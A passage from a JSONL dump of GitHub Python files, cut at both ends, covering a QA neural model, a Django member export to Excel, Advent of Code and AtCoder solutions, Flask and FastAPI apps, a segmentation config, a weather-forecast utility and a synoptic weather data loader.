self.ptr(hr, prev_ha, beta)\n\n elif i == 1:\n output[:, :, i] = beta\n\n return output\n\n\nclass MatchNet(nn.Module):\n def __init__(self, vocab_size, embed_dim, hidden_dim, cuda, num_layers, bidirectional):\n super(MatchNet, self).__init__()\n\n self.hidden_dim = hidden_dim\n self.bidirectional = bidirectional\n self.embed = Embed(vocab_size, embed_dim)\n self.encoder = Encoder(embed_dim, self.hidden_dim, num_layers, bidirectional)\n self.matchlstm = MatchLSTM(self.hidden_dim, cuda)\n self.lstm = LSTMLayer(self.hidden_dim, bidirectional)\n self.ansptr = AnsPtr(self.hidden_dim, cuda)\n\n def forward(self, doc, qry, dm, qm):\n batch_size = doc.size(0)\n\n doc, qry = self.embed(doc, qry)\n\n doc_h0 = self.encoder.init_hidden(batch_size, self.bidirectional)\n qry_h0 = self.encoder.init_hidden(batch_size, self.bidirectional)\n hr_h0 = self.lstm.init_hidden(batch_size, self.bidirectional)\n\n doc_h, qry_h = self.encoder(doc, qry, doc_h0, qry_h0)\n hr = self.matchlstm(doc_h, qry_h, dm, qm)\n\n hr_h = self.lstm(hr, hr_h0)\n output = self.ansptr(hr_h, qry_h, dm, qm)\n\n output1 = F.log_softmax((output[:, :, 0]).contiguous().view(batch_size, -1))\n output2 = F.log_softmax((output[:, :, 1]).contiguous().view(batch_size, -1))\n\n return output1, output2\n","repo_name":"muguliebe/st-nlp","sub_path":"03-QA/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35876569710","text":"from django.http.response import HttpResponse, HttpResponseForbidden\nimport openpyxl\nfrom openpyxl.utils import get_column_letter\nfrom tempfile import NamedTemporaryFile\nfrom .utils import is_admin, getMySelfId\nfrom .models import Team, Member, TeamMember, MemberRole\n\n\ndef email(member):\n if not member.email_adfc:\n return member.email_private\n if not member.email_private:\n return member.email_adfc\n return member.email_adfc if member.pref else member.email_private\n\n\ndef ags(member):\n teamnames = [team.name for team in member.teams.all()]\n return \",\".join(teamnames)\n\n\nheaders = [\n (\"Nachname\", \"last_name\", 20),\n (\"Vorname\", \"first_name\", 20),\n (\"Geschlecht\", \"gender\", 10),\n (\"Geburtsjahr\", \"birthday\", 12),\n (\"Email-ADFC\", \"email_adfc\", 30),\n (\"Email-Privat\", \"email_private\", 30),\n (\"Email\", email, 30),\n (\"Telefon\", \"phone_primary\", 20),\n (\"Telefon-Alternative\", \"phone_secondary\", 20),\n (\"Postleitzahl\", \"address\", 12),\n (\"Mitgliedsnummer\", \"adfc_id\", 17),\n (\"Referenz\", \"reference\", 50),\n (\"AGs\", ags, 50),\n (\"Interessen\", \"interests\", 50),\n (\"Letzter Kontakt\", \"latest_contact\", 20),\n (\"Kommentar\", \"admin_comments\", 50),\n (\"Aktiv\", \"active\", 10),\n (\"Letztes Erste-Hilfe-Training\", \"latest_first_aid_training\", 20),\n (\"Registriert für Erste-Hilfe-Training\",\n \"registered_for_first_aid_training\", 10)\n]\n\n\ndef response(title, members, file, pref):\n if not file.endswith(\".xlsx\"):\n file += \".xlsx\"\n wb = openpyxl.Workbook()\n ws = wb.active\n ws.title = title\n\n ws.append([h[0] for h in headers])\n for member in members:\n member.pref = pref\n ws.append([getattr(member, h[1]) if isinstance(\n h[1], str) else h[1](member) for h in headers])\n for idx, col in enumerate(ws.columns, 1):\n ws.column_dimensions[get_column_letter(\n idx)].width = headers[idx-1][2]\n with NamedTemporaryFile() as tmp:\n wb.save(tmp)\n tmp.seek(0)\n content = tmp.read()\n resp = HttpResponse(\n content, content_type=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\")\n resp.headers[\"Content-Disposition\"] = f\"attachment; filename={file}\"\n return resp\n\n\ndef excelTeam(req, teamId, file, prefEmail):\n members = []\n\n team = Team.objects.get(pk=teamId)\n if not is_admin(req):\n myselfId = getMySelfId(req)\n try:\n # has logged in user role=\"Vorsitz\" in this team?\n teamMember = team.teammember_set.get(member_id=myselfId)\n role = teamMember.member_role\n if role.title != \"Vorsitz\":\n return HttpResponseForbidden()\n except Exception as e:\n return HttpResponseForbidden()\n return response(team.name, team.members.order_by(\"last_name\", \"first_name\"), file, prefEmail == \"ADFC\")\n\n\ndef excelMembers(req, file, prefEmail):\n if not is_admin(req):\n return HttpResponseForbidden()\n members = Member.objects.all().order_by(\"last_name\", \"first_name\")\n return response(\"Alle Aktiven\", members, file, prefEmail == \"ADFC\")\n","repo_name":"michaelu123/aktdb","sub_path":"aktivendb/excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30402521929","text":"from typing import List, Tuple\n\n\nDIRECTION = {\n 'R': [0, 1],\n 'L': [0, -1],\n 'U': [1, 0],\n 'D': [-1, 0],\n}\n\nWireCoordinates = List[Tuple[int, Tuple[int, int], int]]\n\n\ndef get_closest_travel_distance_of_intersection(wire1: List[str], wire2: List[str]) -> int:\n wire1_vertical, wire1_horizontal = get_wire_coordinates(wire1)\n wire2_vertical, wire2_horizontal = get_wire_coordinates(wire2)\n\n intersections = get_intersection_lengths(wire1_horizontal, wire2_vertical) + get_intersection_lengths(wire2_horizontal, wire1_vertical)\n\n return min(intersections)\n\n\ndef get_wire_coordinates(wire: List[str]) -> (WireCoordinates, WireCoordinates):\n global DIRECTION\n x: int = 0\n y: int = 0\n total_length: int = 0\n vertical_coords: WireCoordinates = []\n horizontal_coords: WireCoordinates = []\n\n for action in wire:\n direction = action[0]\n distance = int(action[1:])\n new_x = x + (distance * DIRECTION[direction][0])\n new_y = y + (distance * DIRECTION[direction][1])\n if direction in 'RL':\n horizontal_coords.append((new_x, (y, new_y), total_length))\n else:\n vertical_coords.append((new_y, (x, new_x), total_length))\n x = new_x\n y = new_y\n total_length += distance\n\n return horizontal_coords, vertical_coords\n\n\ndef get_intersection_lengths(horizontal_coords: WireCoordinates, vertical_coords: WireCoordinates) -> List[int]:\n intersections: List[int] = []\n\n for h_coord in horizontal_coords:\n for v_coord in vertical_coords:\n if min(h_coord[1]) < v_coord[0] < max(h_coord[1]) and min(v_coord[1]) < h_coord[0] < max(v_coord[1]):\n travel_distance1 = v_coord[2] + abs(abs(h_coord[0]) - abs(v_coord[1][0]))\n travel_distance2 = h_coord[2] + abs(abs(v_coord[0]) - abs(h_coord[1][0]))\n intersections.append(travel_distance1 + travel_distance2)\n\n return intersections\n\n\nif __name__ == '__main__':\n wire1 = 'R8,U5,L5,D3'\n wire2 = 'U7,R6,D4,L4'\n print(get_closest_travel_distance_of_intersection(wire1.split(','),wire2.split(',')))\n\n wire1 = \"R75,D30,R83,U83,L12,D49,R71,U7,L72\"\n wire2 = \"U62,R66,U55,R34,D71,R55,D58,R83\"\n print(get_closest_travel_distance_of_intersection(wire1.split(','),wire2.split(',')))\n\n wire1 = \"R98,U47,R26,D63,R33,U87,L62,D20,R33,U53,R51\"\n wire2 = \"U98,R91,D20,R16,D67,R40,U7,R15,U6,R7\"\n print(get_closest_travel_distance_of_intersection(wire1.split(','),wire2.split(',')))\n\n with open('input.txt') as f:\n lines = f.readlines()\n wire1 = lines[0]\n wire2 = lines[1]\n print(get_closest_travel_distance_of_intersection(wire1.split(','),wire2.split(',')))\n","repo_name":"rob256/adventofcode2019","sub_path":"python3/day_3/day_3_part_2.py","file_name":"day_3_part_2.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15050818422","text":"from fastapi.testclient import TestClient\n\nfrom app.core.config import settings\n\n\ndef test_item_get_multi(client: TestClient) -> None:\n \"\"\"Test the get items endpoint\"\"\"\n r = client.get(f\"{settings.API_VERSION}/item/\")\n assert r.status_code == 200\n\n all_runs = r.json()\n assert len(all_runs) > 0\n","repo_name":"tsladecek/create-fastapi-app","sub_path":"src/cfa/fastapi-app/app/tests/api/v1/test_item.py","file_name":"test_item.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"7305200081","text":"import os\n\n\ndef get_number():\n user_input = None\n while user_input is None:\n try:\n user_input = float(input())\n except ValueError:\n print('Please, try again and enter only a one float number')\n return user_input\n\n\ndef get_model_properties() -> object:\n print('Please, enter frequency w')\n w = get_number()\n print('Now, please enter dissipation coefficient b')\n b = get_number()\n print('Now, please enter x_0')\n x_0 = get_number()\n print('Now, please enter v_0')\n v_0 = get_number()\n print('At last, enter the duration of a simulation video')\n duration = get_number()\n return [w, b, duration, x_0, v_0]\n\n\ndef run_video(properties, model_func):\n print('we are done!\\nIf you want to run video press 1')\n if get_number() == 1:\n w = properties[0]\n b = properties[1]\n os.system('xdg-open videos/simulation_{name}_omega_{omega}_dissip_{betta}.avi'.format(\n name=model_func.__name__, omega=w, betta=b))\n else:\n print('Ok, if you do not want to run video now, you can do it later manually. Bye!')\n","repo_name":"YanLogovskiy/simulation_of_rotating_bodies","sub_path":"user_interaction.py","file_name":"user_interaction.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35535676772","text":"from hashlib import new\nfrom flask_controller import FlaskController\nfrom flaskr.app import app\nfrom flask import render_template, session, request, redirect, url_for, flash\nfrom flaskr.models import db, usuarios\n\nclass usuariosController(FlaskController):\n @app.route(\"/usuarios\")\n def usuarios():\n result_usuarios = usuarios.obtener_usuarios()\n return render_template('usuarios.html', titulo='Gestión de usuarios', lista_usuarios=result_usuarios)\n\n @app.route(\"/crear_usuario\", methods=['GET','POST'])\n def crear_usuario():\n if request.method == 'POST':\n nombre_usuario = request.form.get('usuarios')\n if not nombre_usuario:\n flash('El usuario es un campo obligatorio')\n else:\n usuarios = usuarios(nombre_usuario=nombre_usuario)\n usuarios.crear_usuario(usuarios)\n return redirect(url_for('usuarios'))\n return render_template('crear_usuario.html', titulo='Nuevo usuario')\n\n @app.route(\"/editar_usuario/<int:id>\", methods=['GET'])\n def editar_usuario(id=0): \n usuario = usuarios.obtener_usuario(id) \n return render_template('editar_usuario.html', usuario=usuario, titulo=\"Editar usuario\")\n \n @app.route(\"/actualizar_usuario\", methods=['POST'])\n def actualizar_usuario():\n id_usuario = request.form.get('id')\n nombre_usuario = request.form.get('usuario')\n if not nombre_usuario:\n flash('El usuario es un campo obligatorio')\n else:\n usuario = usuarios.obtener_usuario(id_usuario)\n usuario.nombre = nombre_usuario\n usuarios.actualizar_usuario(usuario=usuario)\n return redirect(url_for('usuarios'))\n \n # Si el flujo llega hasta aquí, significa que ocurrió un error\n flash('Ocurrió un error al actualizar el usuario', 'error')\n return redirect(url_for('usuarios'))\n \n @app.route(\"/eliminar_usuario/<int:id>\")\n def eliminar_usuario(id):\n usuarios.eliminar_usuario(id=id)\n return redirect(url_for('usuarios'))\n ","repo_name":"FRANBETM/proyecto-facturacion","sub_path":"flaskr/controllers/usuarios_controller.py","file_name":"usuarios_controller.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17330795327","text":"import os\nimport argparse\nimport shutil\nfrom flask import Flask, render_template, request, flash\n\napp = Flask(__name__)\n\n\ndef argument_parser():\n \"\"\"\n Setting up an argument parser for dynamic port changing\n :return: args\n \"\"\"\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-p\", \"--port\", default=5000,\n help=\"port to run the app on\")\n args = vars(ap.parse_args())\n return args\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef home():\n \"\"\"\n Homepage of the webapp\n :return: Renders the page\n \"\"\"\n return render_template('index.html', data=[{'emotion': 'Please Select an Emotion'}, {'emotion': 'Happy'},\n {'emotion': 'Sad'}, {'emotion': 'Thriller'}])\n\n\n@app.route(\"/generate\", methods=['GET', 'POST'])\ndef generate():\n \"\"\"\n The url redirect to generate API.\n Users can select emotion and generate tunes\n :return: Renders the generate page\n \"\"\"\n input_data = list(request.form.values())\n emotion = input_data[0].lower()\n path = ''\n try:\n if emotion in os.listdir(\"static/generated_songs\"):\n for i in os.listdir(f'static{os.sep}generated_songs' + os.sep + emotion):\n if i.endswith(\"mid\") or i.endswith(\"midi\"):\n print('generated_songs' + os.sep + emotion + os.sep + i)\n shutil.copyfile(f'static{os.sep}generated_songs' + os.sep + emotion + os.sep + i, f\"static{os.sep}staging\" + os.sep + i)\n path = \"staging\" + os.sep + i\n os.remove(f'static{os.sep}generated_songs' + os.sep + emotion + os.sep + i)\n break\n else:\n return render_template('index.html',\n data=[{'emotion': 'Please Select an Emotion'}, {'emotion': 'Happy'},\n {'emotion': 'Sad'}, {'emotion': 'Thriller'}])\n except Exception as e:\n\n print(\"Exception: {}\".format(str(e)))\n\n return render_template('generate.html', path=path,\n data=[{'emotion': 'Please Select an Emotion'}, {'emotion': 'Happy'},\n {'emotion': 'Sad'}, {'emotion': 'Thriller'}])\n\n\nif __name__ == '__main__':\n args = argument_parser()\n app.run(debug=True, port=int(args['port']))\n","repo_name":"gokul-labs/avocado-chair","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1655118831","text":"import pandas as pd\nfrom argparse import ArgumentParser\nfrom scipy.stats import pearsonr\n\n\ndef main():\n args = get_args()\n df1 = pd.read_csv(filepath_or_buffer=args.pr1,\n sep=\"\\t\",\n header=None,\n names=['caller', 'length', 'precision', 'recall', 'opacity'])\n df2 = pd.read_csv(filepath_or_buffer=args.pr2,\n sep=\"\\t\",\n header=None,\n names=['caller', 'length', 'precision', 'recall', 'opacity'])\n shared_lengths = set(df1[\"length\"]).intersection(set(df2[\"length\"]))\n for feat in ['precision', 'recall']:\n cc, p = pearsonr(df1[df1[\"length\"].isin(shared_lengths)].sort_values('length')[feat],\n df2[df2[\"length\"].isin(shared_lengths)].sort_values('length')[feat])\n print(\"Correlation for {}: {} ; p-value {}\".format(feat, cc, p))\n\n\ndef get_args():\n parser = ArgumentParser(\n description=\"Plot precision and recall in function of increasing read length\")\n parser.add_argument(\n \"pr1\", help=\"file with 5 columns, of which 3 and 4 are precision and recall\")\n parser.add_argument(\n \"pr2\", help=\"file with 5 columns, of which 3 and 4 are precision and recall\")\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wdecoster/read_length_SV_discovery","sub_path":"correlation-simulation.py","file_name":"correlation-simulation.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"73631185546","text":"from datetime import datetime\nimport requests\nfrom config import api_key\n\n#Definir os dias da semana\ndef retornaDiaSemana(dtTXT):\n seg = 1\n ter = 2\n qua = 3\n qui = 4\n sex = 5\n sab = 6\n dt = datetime.fromisoformat(dtTXT)\n diaSemana = dt.isoweekday()\n if(diaSemana == seg):\n return \"SEG\"\n elif(diaSemana == ter):\n return \"TER\"\n elif (diaSemana == qua):\n return \"QUA\"\n elif (diaSemana == qui):\n return \"QUI\"\n elif (diaSemana == sex):\n return \"SEX\"\n elif (diaSemana == sab):\n return \"SAB\"\n else:\n return \"DOM\"\n\n\ndef retornaHoje():\n hoje = (datetime.today())\n\n minute = ''\n if(hoje.minute <10):\n minute = \"0\"+str(hoje.minute)\n else:\n minute = str(hoje.minute)\n\n hojeFormatado = str(hoje.hour) + \":\"+ minute +\"h - \" + str(hoje.day) + \" de \" +retornaMes()\n return hojeFormatado\n\n\ndef retornaMes():\n hoje = (datetime.today())\n mesAtual = hoje.month\n\n if(mesAtual == 1):\n return \"Janeiro\"\n elif(mesAtual == 2):\n return \"Fevereiro\"\n elif (mesAtual == 3):\n return \"Março\"\n elif (mesAtual == 4):\n return \"Abril\"\n elif (mesAtual == 5):\n return \"Maio\"\n elif (mesAtual == 6):\n return \"Junho\"\n elif (mesAtual == 7):\n return \"Julho\"\n elif (mesAtual == 8):\n return \"Agosto\"\n elif (mesAtual == 9):\n return \"Setembro\"\n elif (mesAtual == 10):\n return \"Outubro\"\n elif (mesAtual == 11):\n return \"Novembro\"\n elif (mesAtual == 12):\n return \"Dezembro\"\n\n\ndef convert_az_to_bearing(a):\n \"\"\"Pega o azimute, que deve ser de 0-360 graus, e retorna uma string N / E / S / W.\n O norte é 0 graus.\"\"\"\n directionWind = \"\"\n if a > 360 or a < 0 or not a:\n directionWind = \"\"\n elif a >= 348.75 or a < 11.25:\n directionWind = \"Norte\"\n elif a >= 11.25 and a < 33.75:\n directionWind = \"Norte-Nordeste\"\n elif a >= 33.75 and a < 56.25:\n directionWind = \"Nordeste\"\n elif a >= 56.25 and a < 78.75:\n directionWind = \"Nordeste\"\n elif a >= 78.75 and a < 101.25:\n directionWind = \"Leste\"\n elif a >= 101.25 and a < 123.75:\n directionWind = \"Leste-Sudeste\"\n elif a >= 123.75 and a < 146.25:\n directionWind = \"Sudeste\"\n elif a >= 146.25 and a < 168.75:\n directionWind = \"Sul-Sudeste\"\n elif a >= 168.75 and a < 191.25:\n directionWind = \"Sul\"\n elif a >= 191.25 and a < 213.75:\n directionWind = \"Sudoeste\"\n elif a >= 213.75 and a < 236.25:\n directionWind = \"Sudoeste\"\n elif a >= 236.25 and a < 258.75:\n directionWind = \"Oeste-Sudoeste\"\n elif a >= 258.75 and a < 281.25:\n directionWind = \"Oeste\"\n elif a >= 281.25 and a < 303.75:\n directionWind = \"Oeste-Noroeste\"\n elif a >= 303.75 and a < 326.25:\n directionWind = \"Noroeste\"\n elif a >= 326.25 and a < 348.75:\n directionWind = \"Noroeste\"\n else:\n directionWind = \"\"\n\n return directionWind + \" (\" + str(a) + \")\"\n\n\ndef convert_wind_for_human(speed_wind):\n wind_description = ''\n if(speed_wind < 0.3):\n wind_description = \"Calmo\"\n elif(speed_wind <= 1.5):\n wind_description = \"Aragem\"\n elif (speed_wind <= 3.3):\n wind_description = \"Brisa leve\"\n elif (speed_wind <= 5.4):\n wind_description = \"Brisa fraca\"\n elif (speed_wind <= 7.9):\n wind_description = \"Brisa moderada\"\n elif (speed_wind <= 10.7):\n wind_description = \"Brisa forte\"\n elif (speed_wind <= 13.8):\n wind_description = \"Vento fresco\"\n elif (speed_wind <= 17.1):\n wind_description = \"Vento forte\"\n elif (speed_wind <= 20.7):\n wind_description = \"Ventania\"\n elif (speed_wind <= 24.4):\n wind_description = \"Ventania forte\"\n elif (speed_wind <= 28.4):\n wind_description = \"Tempestade\"\n elif (speed_wind <= 32.6):\n wind_description = \"Tempestada violenta\"\n elif (speed_wind > 32.6):\n wind_description = \"Furacão\"\n\n return wind_description\n\n\ndef convert_ms_km(wind_speed):\n km = wind_speed * 3.6\n\n return round(km,2)\n\n\ndef convert_kelvin_celsius(temp):\n celsius = temp - 273.15\n return round(celsius,2)\n\n\ndef convert_unix_hour(unix):\n hora = datetime.fromtimestamp(unix).strftime('%H:%M')\n return hora\n\n\ndef find_forecasts(cidadeID):\n\n forecast = []\n\n semana = find_index_week(cidadeID)\n\n previsao = {'day':'previsao'}\n url = f'http://api.openweathermap.org/data/2.5/forecast?id={cidadeID}&appid={api_key}&lang=pt_br'\n response = requests.get(url).json()\n lista = response['list']\n\n for linha in semana:\n day = linha['day']\n index = linha['index']\n\n description = lista[index]['weather'][0]['description']\n\n # RETORNANDO O ICON\n icon = lista[index]['weather'][0]['icon']\n\n #RETORNANDO MAIN_TODAY\n temp = lista[index]['main']['temp']\n tempCelsius = str(convert_kelvin_celsius(temp)) + \"ºC\"\n\n #RETORNANDO PRESSAO ATMOSFERICA\n pressure = lista[index]['main']['pressure']\n pressure = str(pressure) + \" hpa\"\n\n #RETORNANDO A HUMIDADE\n humidity = lista[index]['main']['humidity']\n humidity = str(humidity) +\"%\"\n\n # RETORNANDO CLOUDS\n\n clouds = lista[index]['clouds']['all']\n clouds = str(clouds)+\"%\"\n\n # RETORNNDO GEO CODE\n lat = response['city']['coord']['lat']\n lon = response['city']['coord']['lon']\n coords = str(lat) + \", \" + str(lon)\n\n #RETORNANDO STATUS WIND\n wind_deeg = lista[index]['wind']['deg']\n wind_speed = lista[index]['wind']['speed']\n wind_text = convert_wind_for_human(wind_speed)\n wind_status = wind_text +\", \" + str(convert_ms_km(wind_speed)) + \" km/h, \" + convert_az_to_bearing(wind_deeg)\n\n wind_speed = str(convert_ms_km(wind_speed)) + \" km/h\"\n\n #RETORNANDO SUNRISE\n sunrise = response['city']['sunrise']\n sunrise = convert_unix_hour(sunrise)\n\n # RETORNANDO SUNSET\n sunset = response['city']['sunset']\n sunset = convert_unix_hour(sunset)\n\t\n\t#RETORNADO CITY\n city = response['city']['name']\n\n # RETORNADO data\n data = lista[index]['dt_txt']\n date = retorna_dia_mes(data)\n\n novaPrevisaoHoje = {\n \"temp\": tempCelsius,\n \"wind\":wind_status,\n \"cloudiness\": wind_text,\n \"pressure\": pressure,\n \"humidity\":humidity,\n \"sunrise\":sunrise,\n \"sunset\":sunset,\n \"icon\":icon,\n \"date\":date,\n \"clouds\": clouds,\n \"wind_speed\":wind_speed,\n \"coords\": coords,\n \"day\": day,\n\t\t\t\t\"city\": city,\n }\n\n forecast.append(novaPrevisaoHoje)\n\n return forecast\n\n\ndef retorna_dia_mes(dt_txt):\n dt = datetime.fromisoformat(dt_txt)\n\n mes = dt.month\n dia = str(dt.day)\n nomeMes = str(retornaMes_by_int(mes))\n\n return dia+ \" de \"+ nomeMes\n\n\n # minute = ''\n # if(hoje.minute <10):\n # minute = \"0\"+str(hoje.minute)\n # else:\n # minute = str(hoje.minute)\n #\n # hojeFormatado = str(hoje.hour) + \":\"+ minute +\"h - \" + str(hoje.day) + \" de \" +retornaMes()\n # return hojeFormatado\n\n\ndef retornaMes_by_int(mes):\n\n if(mes == 1):\n return \"Janeiro\"\n elif(mes == 2):\n return \"Fevereiro\"\n elif (mes == 3):\n return \"Março\"\n elif (mes == 4):\n return \"Abril\"\n elif (mes == 5):\n return \"Maio\"\n elif (mes == 6):\n return \"Junho\"\n elif (mes == 7):\n return \"Julho\"\n elif (mes == 8):\n return \"Agosto\"\n elif (mes == 9):\n return \"Setembro\"\n elif (mes == 10):\n return \"Outubro\"\n elif (mes == 11):\n return \"Novembro\"\n elif (mes == 12):\n return \"Dezembro\"\n\ndef find_index_week(cidadeID):\n semana = []\n diaAtual=\"\"\n url = f'http://api.openweathermap.org/data/2.5/forecast?id={cidadeID}&appid={api_key}&lang=pt_br'\n response = requests.get(url).json()\n lista = response['list']\n\n i = 0\n for linha in lista:\n diaObtido = retornaDiaSemana(lista[i]['dt_txt'])\n\n if diaObtido != diaAtual:\n diaAtual = diaObtido\n dia = {'day':diaAtual,\n 'index':i}\n semana.append(dia)\n\n i = i + 1\n return semana\n\n\n\n\n\n\n\n","repo_name":"dionlaranjeira/api-previsao-python","sub_path":"PrevisaoUtil.py","file_name":"PrevisaoUtil.py","file_ext":"py","file_size_in_byte":8648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"43170604282","text":"_base_ = [\n '../_base_/default_runtime.py',\n # DAFormer Network Architecture\n # '../_base_/models/daformer_sepaspp_mitb5.py',\n # GTA->Cityscapes Data Loading\n '../_base_/datasets/uda_rural_to_urban_512x512.py',\n # Basic UDA Self-Training\n '../_base_/uda/advseg_model.py',\n '../_base_/schedules/schedule_160k.py'\n]\n# Random Seed\nseed = 0\n# Modifications to Basic UDA\n\ndata = dict(\n train=dict(\n # Rare Class Sampling\n rare_class_sampling=dict(\n min_pixels=3000, class_temp=0.01, min_crop_ratio=0.5)))\n# Optimizer Hyperparameters\nmax_iters = 40000\nmodel = dict(max_iters=max_iters)\noptimizer_config = None\noptimizer = dict(\n type='AdamW',\n lr=6e-05,\n betas=(0.9, 0.999),\n weight_decay=0.01,\n paramwise_cfg=dict(\n custom_keys=dict(\n head=dict(lr_mult=10.0),\n pos_block=dict(decay_mult=0.0),\n norm=dict(decay_mult=0.0))))\nlr_config = dict(\n policy='poly',\n warmup='linear',\n warmup_iters=1500,\n warmup_ratio=1e-06,\n power=1.0,\n min_lr=0.0,\n by_epoch=False)\nn_gpus = 1\nrunner = dict(type='IterBasedRunner', max_iters=max_iters)\n# runner = dict(type='EpochBasedRunner', max_epochs=160)\n# Logging Configuration\ncheckpoint_config = dict(by_epoch=False, interval=2000, max_keep_ckpts=3) #False 40000\nevaluation = dict(interval=2000, metric='mIoU', save_best='mIoU') #, pre_eval=True\n\n# evaluation = dict(interval=100, metric='mIoU') #4000\n# Meta Information for Result Analysis\nname = 'rural2urban_uda_advseg_daformer_mitb5_s0'\nexp = 'basic'\nname_dataset = 'rural2urban'\nname_architecture = 'daformer_sepaspp_mitb5'\nname_encoder = 'mitb5'\nname_decoder = 'daformer_sepaspp'\nname_uda = 'dacs_a999_fd_things_rcs0.01_cpl'\nname_opt = 'adamw_6e-05_pmTrue_poly10warm_1x2_40k'\n","repo_name":"yixinzhishui/mmsegmentation_rsipac","sub_path":"configs_custom/daformer/rural2urban_uda_advseg_daformer.py","file_name":"rural2urban_uda_advseg_daformer.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27565903609","text":"import sys\nfrom queue import *\nsys.setrecursionlimit(10**7)\n\nn, q = list(map(int, input().split()))\n\nadjacent_list = [[] for i in range(n+1)]\nfor i in range(n - 1):\n a, b = map(int, input().split())\n adjacent_list[a].append(b)\n adjacent_list[b].append(a)\ntree_value = [0]*(n+1)\nfor i in range(q):\n p, x = map(int, input().split())\n tree_value[p] += x\nsearched = set()\nused = [0 for i in range(n+1)]\nque = Queue()\nque.put(1)\nwhile que.qsize() != 0:\n m = que.get()\n used[m] = 1\n for i in adjacent_list[m]:\n if not used[i]:\n tree_value[i] += tree_value[m]\nfor i in range(1,n+1):\n print(\"{} \".format(tree_value[i]), end = \"\")\n","repo_name":"Yuta123456/AtCoder","sub_path":"python/AtCoder Beginner Contest 138/Ki.py","file_name":"Ki.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17945341879","text":"from rest_framework import serializers\n\nfrom spacare.chi_tiet_lich_hen.models import ChiTietLichHen\nfrom spacare.dich_vu.serializers import DichVuSerializer\n\n\nclass ChiTietLichHenSerializer(serializers.ModelSerializer):\n class Meta:\n model = ChiTietLichHen\n fields = \"__all__\"\n extra_kwargs = {\n \"id\": {\"read_only\": True},\n \"created_at\": {\"read_only\": True},\n \"updated_at\": {\"read_only\": True},\n }\n\n\nclass ReadChiTietLichHenSerializer(serializers.ModelSerializer):\n dich_vu = DichVuSerializer(read_only=True)\n\n class Meta:\n model = ChiTietLichHen\n fields = \"__all__\"\n extra_kwargs = {\n \"id\": {\"read_only\": True},\n \"created_at\": {\"read_only\": True},\n \"updated_at\": {\"read_only\": True},\n }\n\n\nclass BulkChiTietLichHenSerializer(serializers.ModelSerializer):\n class Meta:\n model = ChiTietLichHen\n fields = [\n \"dich_vu\",\n \"lich_hen\",\n \"trang_thai\",\n ]\n","repo_name":"DuyViet-Vo/spa-care","sub_path":"spacare/chi_tiet_lich_hen/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6644858926","text":"import datetime\nimport os\nfrom pathlib import Path\nfrom typing import Union, Tuple, List\n\nimport numpy as np\nimport pandas as pd\n\nfrom synop.consts import SYNOP_PERIODIC_FEATURES, VISIBILITY, DIRECTION_COLUMN, VELOCITY_COLUMN, GUST_COLUMN, \\\n TEMPERATURE, HUMIDITY, DEW_POINT, PRESSURE\nfrom wind_forecast.util.common_util import NormalizationType\n\n\ndef get_normalization_values(data: pd.DataFrame,\n normalization_type: NormalizationType = NormalizationType.STANDARD) -> (pd.DataFrame, float, float):\n if normalization_type == NormalizationType.STANDARD:\n data_mean = data.mean(axis=0)\n data_std = data.std(axis=0)\n return (data - data_mean) / data_std, data_mean, data_std\n else:\n data_min = data.min(axis=0)\n data_max = data.max(axis=0)\n return (data - data_min) / (data_max - data_min), data_min, data_max\n\n\ndef prepare_synop_dataset(synop_file_name: str, features: list, norm=True,\n dataset_dir=os.path.join(Path(__file__).parent, 'synop_data'),\n from_year=2001, to_year=2021,\n normalization_type: NormalizationType = NormalizationType.STANDARD,\n decompose_periodic=True) \\\n -> Union[Tuple[pd.DataFrame, float, float], pd.DataFrame]:\n synop_file_path = os.path.join(dataset_dir, synop_file_name)\n if not os.path.exists(synop_file_path):\n raise Exception(f\"Dataset not found. Looked for {synop_file_path}\")\n\n data = pd.read_csv(synop_file_path, usecols=features + ['year', 'month', 'day', 'hour'])\n data = data.dropna()\n if synop_file_name == 'WARSZAWA-OKECIE_352200375_data.csv':\n incorrect_gusts = data[data[GUST_COLUMN[1]] >= 22]\n incorrect_gusts = incorrect_gusts[incorrect_gusts[VELOCITY_COLUMN[1]] < 2]\n for index in incorrect_gusts.index:\n data.loc[index][GUST_COLUMN[1]] = data.loc[index-1][GUST_COLUMN[1]]\n\n features_to_check_for_zero_series = [feature for feature in features if feature in [\n VISIBILITY[1],\n DIRECTION_COLUMN[1],\n VELOCITY_COLUMN[1],\n GUST_COLUMN[1],\n TEMPERATURE[1],\n HUMIDITY[1],\n DEW_POINT[1],\n PRESSURE[1],\n ]]\n data = drop_zeros_series(data, features_to_check_for_zero_series, 12)\n\n data[\"date\"] = 